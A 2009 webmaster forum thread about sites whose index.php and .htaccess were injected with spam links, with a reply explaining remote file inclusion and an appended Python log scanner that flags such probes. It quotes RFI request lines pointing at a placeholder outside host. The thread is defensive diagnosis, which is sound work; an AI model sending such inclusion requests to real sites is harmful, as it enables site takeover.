
Site hacked and index.php edited

What kind of access would be required to do this?


surfgatinho

5:17 pm on Mar 4, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Various sites I run have been hacked and the index.php file edited to include a load of spam links. On one site the .htaccess file was edited too.

I think the culprit is probably an out of date version of FCK Editor but what I'm trying to understand is how a hacker would be able to edit a file - this would require a pretty high level of compromise.

Both index and .htaccess file permissions were set to 654/644

Any info would be much appreciated.

Thanks

physics

5:48 pm on Mar 4, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



surfgatinho, sorry to hear it!
Have you checked your log files?
Are you running a CMS?

surfgatinho

10:14 am on Mar 5, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Can't find anything too suspect in the log file, although I'm not 100% sure what I'm looking for.

Yes, I am running a CMS - but it's a really lightweight bespoke one that just writes to a DB and has plenty of input cleaning.

I'm just wondering what level of access someone would need to write to a file?

Also the hosting (not mine) runs PHP 4.3.10

surfgatinho

10:54 am on Mar 19, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Hmm. OK, I removed the file upload script from FCKEditor and there are no writeable directories but they have done it again. Loads of #*$! and pharma links in the index.php and .htaccess file.

Please can someone tell me how an unauthorised user can write to my files?

SteveWh

11:53 am on Mar 19, 2009 (gmt 0)

10+ Year Member



In order to write files to your site, all they have to do is trick one of your site's PHP scripts to include() a script from an outside site. That script becomes part of your script, and when it runs, it has the full access to your file system that your own PHP scripts have.

The other method is to get your FTP password and download/edit/reupload the files, but that's less common.

In your log file, you'd be looking mainly for "remote file inclusion" attacks. They look like:
GET /yourfile.php?inc=hxxp://someothersite.com/safe.txt?
"safe.txt" is just a placeholder above, but it's one of the most common script names used. It is usually found to be a malicious PHP script. It might run through the files in your site, inserting new text into them.

However, if it was through FCK editor, it might not be as easy to spot, as it will likely be some request to an FCK script, and it might have been a POST, not a GET. But it would be from an IP address that isn't yours, which would make it easier to identify.

Look up FCK editor at Secunia. They might have more specific info about known vulnerabilities and when they were discovered.

[edited by: SteveWh at 11:57 am (utc) on Mar. 19, 2009]
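The log pattern Steve describes above, as an added example that is not part of the original thread or of any WebmasterWorld or FCKeditor code: a small Python scanner over constructed Apache/nginx combined-format access-log lines. It flags any query parameter whose value is a URL (the remote file inclusion signature, including the trailing "?" trick quoted in the post), going slightly beyond the thread by also catching percent-encoded values and PHP stream-wrapper schemes, and it separately lists POSTs to editor/upload paths from addresses other than the site owner's. The log format, the editor path hints, the IP addresses and the host names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches Apache/nginx "combined" access-log lines (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that starts with a URL scheme ("http://", "ftp://", and
# PHP stream wrappers such as "php://") is the signature of a remote-file-
# inclusion attempt: the attacker wants include()/require() to fetch and run it.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

# Path fragments of upload/editor components worth watching for POSTs (assumed).
EDITOR_PATH_HINTS = ("fckeditor", "filemanager", "upload")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_url_params(target):
    """Return [(name, value)] for query parameters whose value is a remote/stream URL."""
    query = urlsplit(target).query
    # parse_qsl decodes %-escapes, so "inc=http%3A%2F%2Fevil" is caught as well.
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if SCHEME_RE.match(v)]


def scan_log(lines, trusted_ips=()):
    """Return a list of findings: (rule, client ip, request target, detail)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        target = rec["target"]
        for name, value in remote_url_params(target):
            findings.append(("rfi", rec["ip"], target, f"{name}={value}"))
        # Weaker rule: a POST to an editor/upload script from an address that is
        # not the site owner's. POST bodies are not in the access log, so this
        # only tells you which requests to investigate further.
        path = urlsplit(target).path.lower()
        if (rec["method"] == "POST" and rec["ip"] not in trusted_ips
                and any(h in path for h in EDITOR_PATH_HINTS)):
            findings.append(("editor-post", rec["ip"], target, rec["status"]))
    return findings


# Constructed sample log lines: a normal hit, an RFI probe like the one quoted
# in the thread (the trailing "?" turns whatever the script appends, e.g. ".php",
# into a query string of the remote URL), a percent-encoded variant, and two
# POSTs to the editor's upload script, one from the owner's address.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Mar/2009:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.23 - - [19/Mar/2009:10:05:44 +0000] "GET /yourfile.php?inc=http://someothersite.example/safe.txt? HTTP/1.1" 200 812',
    '198.51.100.23 - - [19/Mar/2009:10:05:52 +0000] "GET /yourfile.php?inc=ftp%3A%2F%2Fsomeothersite.example%2Fsafe.txt HTTP/1.0" 200 812',
    '198.51.100.23 - - [19/Mar/2009:10:07:03 +0000] "POST /fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 33',
    '192.0.2.10 - - [19/Mar/2009:11:00:00 +0000] "POST /fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 33',
]

if __name__ == "__main__":
    # Pass the site owner's own address(es) so their editor sessions are not flagged.
    for finding in scan_log(SAMPLE_LOG, trusted_ips={"192.0.2.10"}):
        print(finding)
```

Run it against a real log with `scan_log(open("access.log"), trusted_ips={...})`; the "rfi" findings give you the attacking address and the remote script URL, and the "editor-post" findings give you the timestamps to correlate with file modification times on index.php and .htaccess.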

surfgatinho

1:38 pm on Mar 19, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Thanks Steve

I think it is RFI. I am using my associate's very dodgy hosting. It runs PHP 4.4.9 with register_globals and allow_url_fopen on.

Great, and this is one of the biggest hosting companies in the UK!